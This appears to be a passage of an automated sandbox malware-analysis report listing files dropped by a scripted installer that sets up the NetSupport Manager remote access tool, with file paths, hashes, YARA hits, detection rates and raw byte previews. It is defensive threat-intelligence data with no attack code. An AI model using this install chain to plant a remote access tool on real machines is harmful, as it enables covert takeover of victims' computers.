                                                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...T.oe.....................J.......!............@.......................... .......O....@....................................<.......8................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...8...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\shfolder.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):46832
                                                                                      Entropy (8bit):6.550943579230967
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:aYxDdwTWm8lJuEFer2pe/p+DHDHf/cklPr2pe/a/fHDHf/ckT:aYDwTelJuEFuee/kjHRee/OjHv
                                                                                      MD5:856CE968807C6915FE987E5D39FCC701
                                                                                      SHA1:30F881812243B98424BB22ED7CCD911E2BD0E2A1
                                                                                      SHA-256:96E0F092E8E930D0989AED462789045392C9159132A35DDDA513C18E495ADDBA
                                                                                      SHA-512:1D1500F95797CFC61728D10F17E1F22762DD7848CD5D8EA978A22170756C77AC9A5A2AC182C137DE8A49E149034CCBF6DA11547B757AFC90581DBABC90D1B048
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L...9.G8....K......#..... ...2.......'.......0....0q....................................................................k...l)..<....@...,...........Y...]...p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc....,...@.......(..............@..@.reloc.......p.......V..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\startlogo.bmp

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PC bitmap, Windows 3.x format, 301 x 50 x 24, image size 45202, resolution 2834 x 2834 px/m, cbSize 45256, bits offset 54
                                                                                      Category:dropped
                                                                                      Size (bytes):45256
                                                                                      Entropy (8bit):1.7322107663428339
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:9w+PTPP6Q9k+BIwe0WRpLmfL8TkLUtyAeCzNPzat1Arxtgx/:9w+rPTTD8T90r6t+x
                                                                                      MD5:E9FCFFB9D2942FB4F8693D0955741C02
                                                                                      SHA1:7BE4057624103FD3A5A6127DD205797F0750DE5D
                                                                                      SHA-256:1D88DC4653BA74CFB65B74EA23CFA42B38A7A9367420C801E1267C27D218C740
                                                                                      SHA-512:9B01B09181BDDF01468B6D1AD61084D27F9FADDD1992A9B0449DA661E2BCFE443C0F668871676DF94E871DBDD9BB4F2F65E175C291AEAE4E1C007FEE6348E4E4
                                                                                      Malicious:false
                                                                                      Preview:BM.......6...(...-...2......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................c..........................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2102752
                                                                                      Entropy (8bit):6.453089786609498
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:e4PM40C89/wp1LsHQFT0qr/H8tTrp7zUbMwOi9NR/Feoke6fUiWZF7tfTHdWq:e4EG8a/sHQFTZHeTrp7zUbMwZhF7ke6W
                                                                                      MD5:A14A67BADCAFD7F70925865FC36CF23A
                                                                                      SHA1:987160B998D3C84DA5EA4A3D7687DC4B5B14F6A3
                                                                                      SHA-256:EB8529698A60A96E2224C298AE0CB8365A46898082CCCFE79356B23057A02A6C
                                                                                      SHA-512:AA592B65CB7DB2CC8D8E8F47E1CB1810F3BDF52D44724BB3902D04FFC73BDBDC80E4A0509F25E33A4C3D2C67BD2BB0E9CB6D0C77DF2E48FD1AFD277B3B3F1183
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\supporttool.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......bn..&.`[&.`[&.`[.A.['.`[/w.[*.`[Iy.[..`[Iy.[..`[/w.[..`[&.a[D.`[Iy.[..`[Iy.[..`[Iy.['.`[Iy.['.`[Rich&.`[........PE..L...x.oe..........................................@...........................!....... ...@.................................P............\...............]... ..T...................................H9..@............................................text............................... ..`.rdata...U.......V..................@..@.data........ ...~..................@....rsrc....\.......^..................@..@.reloc..8.... ......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\toastChat.png

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):15766
                                                                                      Entropy (8bit):2.0905725373226205
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:K4S8+k29W8sEvVQAxN+Y9HC5TZ/gBCNLNLXC54x4I7cdpanub7Te7gMHDI31t+jY:XS5kEWR4QAxNXqdv34CcXjTe7uFiY
                                                                                      MD5:515B10CD836D4F5874037A43F1E77451
                                                                                      SHA1:8ADF1CE3954CF17169F468ED4DD350B0FD5C4CDA
                                                                                      SHA-256:90FF8555B7DBFE2CFE5D2761CCC491153B7C42085E0C490970BF9EB3C150F25A
                                                                                      SHA-512:9CEA72979FD5EA34579E67E9E17D6AF2F6FD354A88573A3D878DFDDF3C0AFD94FA02ABB42C5BCEB6F9D208BEC194018733B8EDA075ED8D36F7CE16C5402AFE2B
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............>a.....pHYs..........+....9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2013-03-16T11:09:05Z</xmp:CreateDate>. <xmp:ModifyDate>2013-08-28T11:40:14+01:00</xmp:ModifyDate>. <xmp:MetadataDat

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\toastImageAndText.png

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):4081
                                                                                      Entropy (8bit):7.869168767091338
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:NZ/I09Da01l+gmkyTt6Hk8nTo2IbRDzqMYCKg:NS0tKg9E05TovbRDznYE
                                                                                      MD5:0A5913FD6ECAE07F96F1FE4D2E9BE596
                                                                                      SHA1:C2CF5940D9FFED0E48A4C9BDB267A26132A6F7CD
                                                                                      SHA-256:3A7D175DC12A1A71DD4E1842321B03BDCD3E35F4AEA38D594E02A5AC883DD1C6
                                                                                      SHA-512:7BC5BD2785087655A58345171CCDB417FCA4AB4B1F74C743DDA853EEFA6F4A823A49B9172580BA4547CCD56E4BE095F8D9ACF5B6E83C2EAF56D5EA594434F8BA
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............>a.....pHYs..........o.d...OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\toastMessage.png

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):15345
                                                                                      Entropy (8bit):1.827778496152507
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:K4S8+k29W8sEv7BNBhxN+Y9Wn8+BC6tjLixBZI7cdpanub7ZQy7AZ:XS5kEWRyBNBhxNXW82KBZCcXjegI
                                                                                      MD5:51957F938C93454E2F3ED13519EBBFC6
                                                                                      SHA1:DF094723F61FEC1111C496D2AFC89FDE0EF80A44
                                                                                      SHA-256:A0EA911CFDF05131B779DE0816B0BEC0D833A9DA1B49AACB098B84A0F871CF56
                                                                                      SHA-512:3723A1C0314AE2396ED2E062F111762B4ED927A062876F189105FC46B9606B326934484C027DDD49F02BC273C924D40A7C96C0CC6375857D6A622CB8F631A72D
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............>a.....pHYs..........+....9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2013-03-16T11:09:10Z</xmp:CreateDate>. <xmp:ModifyDate>2013-08-28T11:38:54+01:00</xmp:ModifyDate>. <xmp:MetadataDat

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):883712
                                                                                      Entropy (8bit):6.824170675528273
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:0WmPrDND1ONC1r4pD84TfEXpS8sYsen/mKvTZuoy4YJp:DmPrBu1ygr
                                                                                      MD5:8ED02A1A11CEC72B6A6A4989BF03CFCC
                                                                                      SHA1:172908FF0F8D7E1C0CBF107F7075ED1DBA4B36C8
                                                                                      SHA-256:4FD02F2699C49579319079B963425991198F59CB1589B8AFA8795B5D6A0E5DB3
                                                                                      SHA-512:444FE62A5C324D38BDC055D298B5784C741F3CA8FAAEAED591BD6DCF94205DBF28C7D7F7D3825CCB99EFF04E3FFD831E3F98D9B314820841A0C0960AE6A5E416
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L...t.nU...........!................`k...............................................(....@A........................`...'............................<...@... ...V...u..8...........................8v..@............................................text............................... ..`.data...............................@....idata..d...........................@..@.rsrc...............................@..@.reloc...V... ...X..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\vccorlib140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):274256
                                                                                      Entropy (8bit):6.569709751417913
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:x4fMnGHxUCkewyeWmUyuueIDKTukcHWu2vizgPSA4qJH9013iSI3s:+fLHyApeWm4uTdkIWRizxkW1R
                                                                                      MD5:F45BBAC53C6DD05436F749ECBF22C1F2
                                                                                      SHA1:5F76AF19249B49505C36593434B68229357F52F9
                                                                                      SHA-256:0B85176125FC996D22B08D25A3344FC1E9C19ECC8A39D291F90ADB98EBAD6268
                                                                                      SHA-512:5B6BAE76F1A6CC8AA09E63802F157A53AC441608A158770FDCA5DE532BD74AA895AD8CB429A6A7CEE93844D7DE5882C0F1BC3BB433F4D1A9EC9FA6E1A5DEE5AA
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...........V........................................................:...........Rich...........PE..L......Z.........."!................0........0...............................@............@A.............................=..............................P-.......X.. J..8...........................XJ..@............................................text............................... ..`.data...Pp...0...n... ..............@....idata..L...........................@..@.rsrc...............................@..@.reloc...X.......Z..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\vcruntime140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):87360
                                                                                      Entropy (8bit):6.8832723005665555
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Q7cAKWRMbpuRQci+7uXTKLWe+27JofZo0ENm2eK7oJnoUSgpAY8ODcDcm7cIsXFf:Q73KiRQcJ7uj8f7Jofm0ENm2eK7mnoU5
                                                                                      MD5:479349B9C24C0A52F504292544492ACC
                                                                                      SHA1:70DA788FA83DDD85FF72308D176352FB87C3D01D
                                                                                      SHA-256:CBCA683F6832E6AEA627F6BCA32788BBA056B78F3ED43015B6B45F8B22407C1F
                                                                                      SHA-512:890973D08EA2D02C88356CE75C64B608E05B153EDFD83C748A407E965A781321198D91A09C6573E9EEE1A3853A7C92E0283F9556878DF3C5776FDEBA78659A18
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .id..:d..:d..:..=:f..:m.A:o..:d..:L..:w..;k..:w..;w..:w..;`..:w..;...:w..;e..:w.-:e..:w..;e..:Richd..:........PE..L......Z.........."!......... ..............................................P............@A................................. .......0..................@?...@..H...p ..8............................ ..@............ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc..H....@......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):345056
                                                                                      Entropy (8bit):6.291223638483511
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:I8RXllwWOZL6CrguQ4fPBIT2TxwyJMIL39+/ziP+9iBIcUaemeL:IUXDIZmydPTvb4RAVcbL
                                                                                      MD5:96E987D909600D34DD70C55F56EB8869
                                                                                      SHA1:3278FFE286AD6894685D5C4248E2E4EBB729E4E2
                                                                                      SHA-256:E627780C49513DFDDF394A5FE929C67D527256AF7407F2AE6CFA6A6996859F9A
                                                                                      SHA-512:DA9BE7015AAB9C447D5A72067BD6704165C56F3E355BA62018F809E6B7F0DC2D20040419A1366CB5DDAFA1EB6CEB51173EF382D214F130F6CA06175747B4B60A
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;.8DZ.kDZ.kDZ.k..ekEZ.k+,ckOZ.kM"nkIZ.kDZ.k.Z.k+,Wk.Z.k+,Vk.Z.k+,gkEZ.k+,`kEZ.kRichDZ.k........................PE..d.....oe.........."......B....................@....................................g.....@.................................................$........@..(Y......<6.......]...........f...............................................`...............................text...FA.......B.................. ..`.rdata.......`.......F..............@..@.data...H....P..."...*..............@....pdata..<6.......8...L..............@..@.rsrc...(Y...@...Z..................@..@.reloc..B...........................@..B................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):97376
                                                                                      Entropy (8bit):6.023234574132757
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:hkybYM1RAFHKrvngTwjhVkHtf0Y8L2dwz/ET9HB1kzQNlkm2aDCCR:7kM1RAFHKrvnYwjhVkHtsYU2dwoTZ3bb
                                                                                      MD5:52B88EB20BEB3B34A692A4CAE0FF2196
                                                                                      SHA1:26A297B2BAEB118F8856C1DE41EE855572BA958A
                                                                                      SHA-256:2B675E9C27D3FB01CB9DF2583B380DE8DC8C0D5BBBE18AF458F90B47C6D62B03
                                                                                      SHA-512:29567FC4DB46D85F9AB8F6ECF2A708EC2C8DEF2E49ECCD439DACEDA327B7411957B2014171A8370C3928D4A03A13BC6124D93678A87684370A5E6042D1C2AD6E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l.,.(.BL(.BL(.BL(.CL0.BL^b9L+.BL^b?L*.BL!..L*.BL!..L).BL^b/L".BL!..L*.BL!..L).BL!..L).BLRich(.BL........PE..d.....KN.........." .....`...........J..............................................H ..........................................................(.......`............b..`.......H....p...............................................p...............................text....Z.......\.................. ..h.rdata.......p.......`..............@..H.data................l..............@....pdata...............p..............@..HINIT.................t.............. ....rsrc...`............x..............@..B.reloc..@............`..............@..B................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):70240
                                                                                      Entropy (8bit):5.649795184953094
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:p8c59WTkwv6MY2d7kz/ET9Hx2aOlP30Bhs1RQuX210ze9MQN7Z2ym+4lcf7xl8uF:qqi8L2dwz/ET9HB1kzQNlkYjaDCCM
                                                                                      MD5:9A348ED02F8B1EFC9BFC5F53827F8A9C
                                                                                      SHA1:C1F22705392AF57B277D1FB4F46258DDDFFE8F33
                                                                                      SHA-256:641F2B86F013A95707FFDF0F584E3A83FEDC1392CEA3B546905B9CCB54AE10CF
                                                                                      SHA-512:9DEBB460FD74CB586ED66B7FA4BBB51A8E1184C1A061E81F4FD6F5E700FDB1E91B809A3F517FE55DD889F60DF6EA29190455073DFA1CB5B85032B91EFD12033F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.K.P.K.P.K.P.K.Q.H.P.=3+.N.P.B..I.P.B..J.P.=3=.J.P.B..I.P.B..J.P.B...J.P.RichK.P.........................PE..d.....KN..........".................dP.......................................P...............................................................P..<....`..h....@..$.......`...........0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata..$....@......................@..HINIT....@....P...................... ....rsrc...h....`......................@..B................................................................................................................................................................................................................................................................

                                                                                      C:\ProgramData\NetSupport\NetSupport Manager\RootCerts\NSLRootCertList.0.pem

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:PEM certificate
                                                                                      Category:dropped
                                                                                      Size (bytes):54748
                                                                                      Entropy (8bit):5.984753862317494
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:WixFWJLb031BOK0OdWEbZht4SsOlHCxJTLNmG4os:WixFWdADOVOIEbZhUOlcpLUG4os
                                                                                      MD5:FC57FB86C8C5974AE2399BBDDDD686A4
                                                                                      SHA1:214EE9F94FAD675ECB8DC0311E9126871209867B
                                                                                      SHA-256:EBAD57E60598E885A5E3E6C7E61EA5504388BEB7D9D855F8AB32958AAF5D1C70
                                                                                      SHA-512:E8E748D85652331762E4A4F49F41D9F9CF9E053FCD6DDBE69DC1766E4188B43A7021F0293D856D476E4C908D240A2F8BA22AEC26B5D02057BBC6C870C88B0747
                                                                                      Malicious:false
                                                                                      Preview:-----BEGIN CERTIFICATE-----..MIIFmTCCA4GgAwIBAgIQea0WoUqgpa1Mc1j0BxMuZTANBgkqhkiG9w0BAQUFADBf..MRMwEQYKCZImiZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0..MS0wKwYDVQQDEyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkw..HhcNMDEwNTA5MjMxOTIyWhcNMjEwNTA5MjMyODEzWjBfMRMwEQYKCZImiZPyLGQB..GRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQDEyRNaWNy..b3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEB..AQUAA4ICDwAwggIKAoICAQDzXfqAZ9Rap6kMLJAg0DUIPHWEzbcHiZyJ2t7Ow2D6..kWhanpRxKRh2fMLgyCV2lA5Y+gQ0Nubfr/eAuulYCyuT5Z0F43cikfc0ZDwikR1e..4QmQvBT+/HVYGeF5tweSo66IWQjYnwfKA1j8aCltMtfSqMtL/OELSDJP5uu4rU/k..XG8TlJnbldV126gat5SRtHdb9UgMj2p5fRRwBH1tr5D12nDYR7e/my9s5wW34RFg..rHmRFHzF1qbk4X7Vw37lktI8ALU2gt554W3ztW74nzPJy1J9c5g224uha6KVl5uj..3sJNJv8GlmclBsjnrOTuEjOVMZnINQhONMp5U9W1vmMyWUA2wKVOBE0921sHM+RY..v+8/U2TYQlk1V/0PRXwkBE2e1jh0EZcikM5oRHSSb9VLb7CG48c2QqDQ/MHAWvmj..YbkwR3GWChawkcBCle8Qfyhq4yofseTNAz93cQTHIPxJDx1FiKTXy36IrY4t7EXb..xFEEySr87IaemhGXW97OU4jm4rf9rJXCKEDb7wSQ34EzOdm

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\vrep[1].msi

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                      Category:dropped
                                                                                      Size (bytes):41645568
                                                                                      Entropy (8bit):7.965918169264881
                                                                                      Encrypted:false
                                                                                      SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                      MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                      SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                      SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                      SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\vrep[1].msi, Author: Joe Security
                                                                                      Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\NSM[1].lic

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Client32[1].ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\wscript.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):837
                                                                                      Entropy (8bit):5.545169772353752
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                      MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                      SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                      SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                      SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                      Malicious:false
